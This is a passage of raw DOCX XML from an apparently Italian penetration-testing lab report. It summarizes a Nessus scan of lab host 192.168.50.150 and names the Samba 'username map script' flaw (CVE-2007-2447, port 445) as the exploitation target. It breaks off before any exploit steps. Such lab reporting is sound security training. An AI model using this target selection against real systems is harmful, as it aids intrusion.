              <w:bottom w:w="100.0" w:type="dxa"/>
              <w:right w:w="150.0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000059">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="1f1f1f"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Target</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="ffffff" w:val="clear"/>
            <w:tcMar>
              <w:top w:w="100.0" w:type="dxa"/>
              <w:left w:w="150.0" w:type="dxa"/>
              <w:bottom w:w="100.0" w:type="dxa"/>
              <w:right w:w="150.0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005A">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="1f1f1f"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">192.168.50.150</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="ededed" w:val="clear"/>
            <w:tcMar>
              <w:top w:w="100.0" w:type="dxa"/>
              <w:left w:w="150.0" w:type="dxa"/>
              <w:bottom w:w="100.0" w:type="dxa"/>
              <w:right w:w="150.0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005B">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="1f1f1f"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Scanner</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="ffffff" w:val="clear"/>
            <w:tcMar>
              <w:top w:w="100.0" w:type="dxa"/>
              <w:left w:w="150.0" w:type="dxa"/>
              <w:bottom w:w="100.0" w:type="dxa"/>
              <w:right w:w="150.0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005C">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="1f1f1f"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Local Scanner</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="ededed" w:val="clear"/>
            <w:tcMar>
              <w:top w:w="100.0" w:type="dxa"/>
              <w:left w:w="150.0" w:type="dxa"/>
              <w:bottom w:w="100.0" w:type="dxa"/>
              <w:right w:w="150.0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005D">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="1f1f1f"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Esito</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="ffffff" w:val="clear"/>
            <w:tcMar>
              <w:top w:w="100.0" w:type="dxa"/>
              <w:left w:w="150.0" w:type="dxa"/>
              <w:bottom w:w="100.0" w:type="dxa"/>
              <w:right w:w="150.0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005E">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="1f1f1f"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Completed</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005F">
      <w:pPr>
        <w:spacing w:after="200" w:line="300" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Al termine dell'elaborazione, Nessus ha restituito un report complessivo di 64 vulnerabilità distinte identificate sul singolo host esaminato, per un totale di 173 occorrenze suddivise per livello di severità, come sintetizzato nella Figura 3. La distribuzione per gravità evidenzia la presenza di 9 vulnerabilità di livello Critical, 5 di livello High, 22 di livello Medium e 8 di livello Low, a conferma dell'elevata esposizione al rischio del sistema target.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000060">
      <w:pPr>
        <w:spacing w:after="0" w:before="200" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="0" distT="0" distL="0" distR="0">
            <wp:extent cx="5207000" cy="2459990"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6"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207000" cy="245999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spacing w:after="300" w:before="100" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="595959"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Figura 2 – </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="595959"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Report Nessus della scansione "Meta" (Basic Network Scan) eseguita sull'host 192.168.50.150: elenco delle 64 vulnerabilità identificate, ordinate per punteggio CVSS, tra cui rientrano molteplici vulnerabilità critiche relative ai servizi Samba, SSL e VNC.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000062">
      <w:pPr>
        <w:spacing w:after="0" w:before="200" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="0" distT="0" distL="0" distR="0">
            <wp:extent cx="5207000" cy="1224280"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5"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207000" cy="1224280"/>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spacing w:after="300" w:before="100" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="595959"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Figura 3 – </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="595959"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Vista riepilogativa della scheda "Hosts" del report Nessus: distribuzione delle 173 occorrenze di vulnerabilità rilevate sull'host 192.168.50.150 per fascia di severità (Critical, High, Medium, Low, Info).</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000064">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="1f3864"/>
          <w:sz w:val="25"/>
          <w:szCs w:val="25"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">5.3 Identificazione della vulnerabilità target</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000065">
      <w:pPr>
        <w:spacing w:after="200" w:line="300" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Tra le vulnerabilità critiche rilevate dalla scansione, è stata selezionata, quale obiettivo dell'attività di exploitation, la vulnerabilità relativa al servizio Samba, di seguito riepilogata:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table4"/>
        <w:tblW w:w="8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5300"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="3200"/>
            <w:gridCol w:w="5300"/>
          </w:tblGrid>
        </w:tblGridChange>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="1f3864" w:val="clear"/>
            <w:tcMar>
              <w:top w:w="100.0" w:type="dxa"/>
              <w:left w:w="150.0" w:type="dxa"/>
              <w:bottom w:w="100.0" w:type="dxa"/>
              <w:right w:w="150.0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000066">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Nome vulnerabilità</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="1f3864" w:val="clear"/>
            <w:tcMar>
              <w:top w:w="100.0" w:type="dxa"/>
              <w:left w:w="150.0" w:type="dxa"/>
              <w:bottom w:w="100.0" w:type="dxa"/>
              <w:right w:w="150.0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000067">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Samba &lt; 3.0.25 'username map script' Command Execution</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="ededed" w:val="clear"/>
            <w:tcMar>
              <w:top w:w="100.0" w:type="dxa"/>
              <w:left w:w="150.0" w:type="dxa"/>
              <w:bottom w:w="100.0" w:type="dxa"/>
              <w:right w:w="150.0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000068">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="1f1f1f"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Identificativo CVE</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="ffffff" w:val="clear"/>
            <w:tcMar>
              <w:top w:w="100.0" w:type="dxa"/>
              <w:left w:w="150.0" w:type="dxa"/>
              <w:bottom w:w="100.0" w:type="dxa"/>
              <w:right w:w="150.0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000069">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="1f1f1f"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">CVE-2007-2447</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="ededed" w:val="clear"/>
            <w:tcMar>
              <w:top w:w="100.0" w:type="dxa"/>
              <w:left w:w="150.0" w:type="dxa"/>
              <w:bottom w:w="100.0" w:type="dxa"/>
              <w:right w:w="150.0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006A">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="1f1f1f"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Severità</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="ffffff" w:val="clear"/>
            <w:tcMar>
              <w:top w:w="100.0" w:type="dxa"/>
              <w:left w:w="150.0" w:type="dxa"/>
              <w:bottom w:w="100.0" w:type="dxa"/>
              <w:right w:w="150.0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006B">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="1f1f1f"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Critical (CVSS Base Score 10.0)</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="ededed" w:val="clear"/>
            <w:tcMar>
              <w:top w:w="100.0" w:type="dxa"/>
              <w:left w:w="150.0" w:type="dxa"/>
              <w:bottom w:w="100.0" w:type="dxa"/>
              <w:right w:w="150.0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006C">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="1f1f1f"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Porta interessata</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="ffffff" w:val="clear"/>
            <w:tcMar>
              <w:top w:w="100.0" w:type="dxa"/>
              <w:left w:w="150.0" w:type="dxa"/>
              <w:bottom w:w="100.0" w:type="dxa"/>
              <w:right w:w="150.0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006D">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="1f1f1f"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">445/tcp</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="ededed" w:val="clear"/>
            <w:tcMar>
              <w:top w:w="100.0" w:type="dxa"/>
              <w:left w:w="150.0" w:type="dxa"/>
              <w:bottom w:w="100.0" w:type="dxa"/>
              <w:right w:w="150.0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006E">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="1f1f1f"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Servizio interessato</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="ffffff" w:val="clear"/>
            <w:tcMar>
              <w:top w:w="100.0" w:type="dxa"/>
              <w:left w:w="150.0" w:type="dxa"/>
              <w:bottom w:w="100.0" w:type="dxa"/>
              <w:right w:w="150.0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006F">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="1f1f1f"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Samba smbd</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000070">
      <w:pPr>
        <w:spacing w:after="200" w:line="300" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
